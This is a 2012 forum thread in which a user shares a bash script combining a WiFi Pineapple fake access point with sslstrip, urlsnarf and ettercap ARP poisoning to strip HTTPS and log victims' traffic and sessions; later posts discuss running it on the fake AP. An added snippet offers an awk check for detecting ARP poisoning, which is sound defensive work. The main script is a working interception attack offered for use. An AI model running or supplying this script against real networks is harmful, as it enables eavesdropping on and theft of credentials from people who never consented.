dwek Posted July 15, 2012

Hi, I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstrip script. The below is sort of working, but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic. I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea. Any thoughts? It's probably something obvious or just my lack of looking. Either way, I thought I would share what I have got so far. Thanks

```bash
#!/bin/bash
#This script combines the Wireless Pineapple (wp4.sh) and the MITM script v1.0 beta found at
#http://360percents.com/posts/automatic-mitm-shell-script/

#define variables
echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: "
read pineapplenetmask
if [[ $pineapplenetmask == '' ]]; then
    pineapplenetmask=255.255.255.0 #Default netmask for /24 network
fi
echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: "
read pineapplenet
if [[ $pineapplenet == '' ]]; then
    pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24
    pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pineapple IP
fi
if [[ $pineapplenet != '172.16.42.0/24' ]]; then
    pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap
fi
echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: "
read pineapplelan
if [[ $pineapplelan == '' ]]; then
    pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple
fi
echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: "
read pineapplewan
if [[ $pineapplewan == '' ]]; then
    pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan
fi
temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: "
read pineapplegw
if [[ $pineapplegw == '' ]]; then
    pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default
fi
echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: "
read pineapplehostip
if [[ $pineapplehostip == '' ]]; then
    pineapplehostip=172.16.42.42 #IP Address of host computer
fi
echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: "
read pineappleip
if [[ $pineappleip == '' ]]; then
    pineappleip=172.16.42.1 #Thanks Douglas Adams
fi

#Display settings
echo Pineapple connected to: $pineapplelan
echo Internet connection from: $pineapplewan
echo Internet connection gateway: $pineapplegw
echo Host Computer IP: $pineapplehostip
echo Pineapple IP: $pineappleip
echo Network: $pineapplenet
echo Netmask: $pineapplenetmask

#Bring up Ethernet Interface directly connected to Pineapple
ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up

# Enable IP Forwarding
echo '1' > /proc/sys/net/ipv4/ip_forward
echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to "
cat /proc/sys/net/ipv4/ip_forward

#clear chains and rules
iptables -X
iptables -F
echo iptables chains and rules cleared

#setup IP forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT
iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A POSTROUTING -t nat -j MASQUERADE
echo IP Forwarding Enabled

#remove default route
route del default
echo Default route removed

#add default gateway
route add default gw $pineapplegw $pineapplewan
echo Pineapple Default Gateway Configured

#create directory to store session results
echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): "
read -e SESSION
mkdir /root/$SESSION/

# Sslstrip
echo "[+] Starting sslstrip"
xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log &
sleep 2

# urlsnarf
echo "[+] Starting urlsnarf"
urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt &
sleep 1

# Ettercap
echo ""
echo "[+] Starting ettercap"
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ &
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
sleep 1

#instructions
#echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan
ping -c3 $pineappleip
if [ $? -eq 0 ]; then
    echo ""
    echo "ICS configuration successful."
    #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan"
    #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'"
    #echo "Enter Pineapple password if prompted"
    #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'
fi
echo ""
echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!"
echo ""
echo ""
echo "[+] IMPORTANT"
echo -n "After you have finished please close this script and clean up properly by hitting y "
echo ""
echo ""
read WISH
echo ""

# Clean up sslstrip, ettercap and urlsnarf
if [ $WISH = "y" ]; then
    echo ""
    echo "[+] Cleaning up and resetting iptables..."
    killall sslstrip
    killall ettercap
    killall urlsnarf
    killall xterm
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/$SESSION/$SESSION.eci
    echo "[+] Clean up successful...Bye!"
    exit
fi
exit
```
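Added example, not part of the original post: the ettercap line in the script above runs ARP poisoning between the Pineapple address and the client range, which leaves two IP addresses sharing one MAC in a client's neighbour table. This check looks for that pattern in `ip neigh` output; the sample table, the MAC addresses and the function names are constructed for illustration.

```bash
# Constructed sample of `ip -4 neigh show` output (not captured from a real network).
# The gateway 172.16.42.1 and the host 172.16.42.42 resolve to the same MAC, which
# is how a client's neighbour table looks while its gateway entry is poisoned.
SAMPLE_NEIGH='172.16.42.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
172.16.42.42 dev wlan0 lladdr 00:11:22:33:44:55 STALE
172.16.42.117 dev wlan0 lladdr 66:77:88:99:AA:BB REACHABLE
172.16.42.200 dev wlan0  FAILED'

# shared_macs: read `ip neigh` lines on stdin and print "MAC ip1,ip2,..." for
# every MAC address that answers for more than one IP address.
shared_macs() {
    awk '
        {
            mac = ""
            for (i = 1; i < NF; i++)
                if ($i == "lladdr") mac = tolower($(i + 1))
            if (mac == "") next              # FAILED/INCOMPLETE entries carry no MAC
            if ((mac, $1) in seen) next      # same IP listed twice (several devices)
            seen[mac, $1] = 1
            ips[mac] = (count[mac]++ ? ips[mac] "," : "") $1
        }
        END {
            for (mac in count)
                if (count[mac] > 1) print mac, ips[mac]
        }
    ' | sort
}

# gateway_is_shadowed GATEWAY_IP: read `ip neigh` lines on stdin; print the
# offending entry and return 0 when the gateway shares its MAC with another IP.
gateway_is_shadowed() {
    shared_macs | awk -v gw="$1" '
        {
            n = split($2, a, ",")
            for (i = 1; i <= n; i++)
                if (a[i] == gw) { print; found = 1 }
        }
        END { exit (found ? 0 : 1) }
    '
}

# Demo on the constructed sample; on a live host: ip -4 neigh show | shared_macs
printf '%s\n' "$SAMPLE_NEIGH" | gateway_is_shadowed 172.16.42.1 &&
    echo "ALERT: gateway MAC is shared with another address"
```

A router that legitimately answers for several addresses (proxy ARP, interface aliases) also matches, so a hit is a lead to compare against the known gateway MAC rather than proof on its own.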
dwek Posted July 16, 2012

I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple. As the Pineapple is a fake AP, I won't need to use any ARP poisoning. Anyone know of anything around? I'm assuming this will also need some port forwarding on for sslstrip to work properly.
telot Posted August 3, 2012

Hop on the Jasager forums for more responses! That's where the pineapple community lives and thrives. We're waist-deep in discussions about ettercap, and there's plenty of threads about sslstrip (I made a nice how-to without ARP) so I think this topic would be especially welcome. Thanks!

telot